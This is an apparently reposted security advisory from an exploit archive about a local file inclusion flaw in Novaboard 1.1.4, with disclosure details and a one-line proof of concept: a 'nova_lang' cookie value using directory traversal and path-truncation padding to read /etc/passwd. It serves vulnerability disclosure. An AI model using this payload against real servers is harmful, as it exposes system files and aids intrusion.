Novaboard v1.1.4 Local File Inclusion Vulnerability

2010-10-28T00:00:00
ID 1337DAY-ID-14607
Type zdt
Reporter High-Tech Bridge
Modified 2010-10-28T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===================================================
Novaboard v1.1.4 Local File Inclusion Vulnerability
===================================================

Reference: http://www.htbridge.ch/advisory/lfi_in_novaboard.html
Product: Novaboard
Vendor: Novaboard  ( http://www.novaboard.net/ )
Vulnerable Version: 1.1.4 and probably prior versions
Vendor Notification: 13 October 2010
Vulnerability Type: Local File Inclusion
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
 
Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in nova_lang variable from cookie.
 
The following PoC is available:
 
 
Cookie: nova_lang=../../../../../../../../../../../../../../etc/passwd/././././.[>4095 * "/."]/././././.



#  0day.today [2018-01-04]  #